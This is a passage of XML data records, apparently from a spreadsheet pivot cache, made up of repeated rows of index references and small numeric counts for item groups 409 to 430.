  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="409"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="409"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="409"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="409"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="409"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="409"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="409"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="409"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="409"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="409"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="409"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="409"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="410"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="410"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="410"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="98"/>
    <x v="410"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="69"/>
    <x v="410"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="410"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="411"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="411"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="411"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="411"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="411"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="411"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="411"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="411"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="411"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="411"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="411"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="411"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="411"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="411"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="412"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="412"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="412"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="412"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="412"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="412"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="412"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="412"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="412"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="412"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="412"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="412"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="412"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="412"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="413"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="413"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="28"/>
    <x v="413"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="6"/>
    <x v="413"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="413"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="413"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="413"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="413"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="413"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="413"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="22"/>
    <x v="413"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="413"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="413"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="413"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="414"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="414"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="414"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="414"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="414"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="415"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="415"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="415"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="415"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="415"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="415"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="416"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="416"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="416"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="416"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="416"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="416"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="416"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="416"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="416"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="416"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="416"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="416"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="416"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="416"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="417"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="417"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="417"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="417"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="417"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="417"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="417"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="417"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="417"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="417"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="417"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="417"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="417"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="8"/>
    <x v="417"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="418"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="418"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="418"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="418"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="14"/>
    <x v="418"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="418"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="16"/>
    <x v="418"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="418"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="9"/>
    <x v="418"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="418"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="16"/>
    <x v="418"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="18"/>
    <x v="418"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="418"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="418"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="419"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="419"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="419"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="419"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="420"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="420"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="420"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="420"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="420"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="420"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="420"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="420"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="420"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="420"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="420"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="420"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="420"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="420"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="421"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="421"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="421"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="421"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="421"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="422"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="422"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="422"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="422"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="423"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="423"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="423"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="423"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="423"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="423"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="423"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="423"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="423"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="423"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="139"/>
    <x v="423"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="131"/>
    <x v="423"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="423"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="423"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="424"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="424"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="424"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="424"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="424"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="424"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="424"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="424"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="424"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="424"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="424"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="424"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="424"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="424"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="425"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="425"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="425"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="425"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="425"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="425"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="426"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="426"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="426"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="426"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="11"/>
    <x v="426"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="426"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="426"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="426"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="426"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="426"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="24"/>
    <x v="426"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="40"/>
    <x v="426"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="426"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="426"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="427"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="427"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="427"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="427"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="428"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="428"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="428"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="428"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="428"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="428"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="428"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="428"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="428"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="428"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="428"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="428"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="428"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="428"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="429"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="429"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="429"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="429"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="429"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="429"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="430"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="430"/>
  </r>
